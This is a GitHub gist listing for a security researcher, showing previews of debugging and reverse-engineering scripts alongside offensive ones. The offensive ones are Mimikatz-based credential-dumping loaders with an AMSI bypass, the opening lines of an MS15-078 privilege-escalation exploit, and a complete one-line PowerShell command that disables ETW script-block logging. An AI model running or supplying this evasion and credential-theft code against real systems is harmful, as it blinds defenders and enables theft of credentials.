Satoshi Tanda tandasat
tandasat
/ dump_vmcs.js
Last active
March 27, 2023 02:09
!dump_vmcs: Windbg JavaScript to dump values of the current VMCS for Hyper-V debugging
View dump_vmcs.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "use strict"; | |
| // This script implements the !dump_vmcs command that displays values of the all | |
| // fields in the current VMCS. The processor must be in VMX-root operation with | |
| // an active VMCS. | |
| function initializeScript() { | |
| return [ | |
| new host.apiVersionSupport(1, 7), | |
| new host.functionAlias(dump_vmcs, "dump_vmcs"), |
tandasat
/ list_first_instruction.py
Created
June 26, 2021 23:13
IDA script to show the first instruction of the all functions
View list_first_instruction.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from idautils import * | |
| from idaapi import * | |
| from idc import * | |
| for funcea in Functions(): | |
| functionName = get_func_name(funcea) | |
| for (startea, endea) in Chunks(funcea): | |
| print(f"{startea:08x} {GetDisasm(startea)} : {functionName}") |
tandasat
/ CheckGuestVmcsFieldsForVmEntry.c
Last active
July 24, 2021 16:54
Simulation of checks performed as per 26.3 CHECKING AND LOADING GUEST STATE
View CheckGuestVmcsFieldsForVmEntry.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * @file CheckGuestVmcsFieldsForVmEntry.c | |
| * @author Satoshi Tanda (tanda.sat@gmail.com) | |
| * @brief Checks validity of the guest VMCS fields for VM-entry as per | |
| * 26.3 CHECKING AND LOADING GUEST STATE | |
| * @version 0.1 | |
| * @date 2021-02-20 | |
| * | |
| * @details This file implements part of checks performed by a processor during | |
| * VM-entry as CheckGuestVmcsFieldsForVmEntry(). This can be called on VM-exit |
tandasat
/ GuestAgent.c
Created
July 26, 2020 19:32
View GuestAgent.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! | |
| @file GuestAgent.c | |
| @brief GuestAgent code. | |
| @author Satoshi Tanda | |
| @copyright Copyright (c) 2020 - , Satoshi Tanda. All rights reserved. | |
| */ | |
| #include "GuestAgent.h" |
tandasat
/ Invoke-BypassingMimikatz.ps1
Last active
April 11, 2019 22:21
Bypass AMSI With a Null Character : http://standa-note.blogspot.ca/2018/02/amsi-bypass-with-null-character.html
View Invoke-BypassingMimikatz.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| function Invoke-Mimikatz | |
| { | |
| <# | |
| .SYNOPSIS | |
| This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
| dump credentials without ever writing the mimikatz binary to disk. | |
| The script has a ComputerName parameter which allows it to be executed against multiple computers. |
tandasat
/ KillETW.ps1
Last active
February 14, 2023 06:57
Disable ETW of the current PowerShell session
View KillETW.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
tandasat
/ Invoke-Mimikidz
Last active
August 31, 2018 18:35
View Invoke-Mimikidz
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Mimikidz | |
| { | |
| <# | |
| .SYNOPSIS | |
| This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
| dump credentials without ever writing the mimikatz binary to disk. | |
| The script has a ComputerName parameter which allows it to be executed against multiple computers. | |
| This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. |
tandasat
/ elevator.c
Created
April 27, 2016 11:48
— forked from sh1n0b1/elevator.c
Windows Open Type ‘atmfd.dll’ Privilege Escalation MS15-078
View elevator.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <string.h> | |
| #include "lib.h" | |
| #include <Wininet.h> | |
| //#include "starter.h" | |
| //include OTF | |
| #include "font.h" // foofont is fetched from loader config struct | |
| //#include "cert.h" |
tandasat
/ ch3_answers.c
Created
November 21, 2014 17:20
(Suspended) Answers of exercises in Practical Reverse Engineering Chapter 3
View ch3_answers.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Susupended because of other project. | |
| /////////////////////////////////////////////////////////////////////////////// | |
| // | |
| // p123 | |
| // | |
| I used Windows 8 kernel version 16628. | |
| //////////////////////////////// 1-6 |
tandasat
/ ch1_answers.c
Created
November 19, 2014 03:31
Answers of exercises in Practical Reverse Engineering Chapter 1
View ch1_answers.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /////////////////////////////////////////////////////////////////////////////// | |
| // | |
| // p11 | |
| // | |
| //////////////////////////////// 1 | |
| ; ASM | |
| edi = s->0x8_charp | |
| edx = edi | |
| eax = 0 |
NewerOlder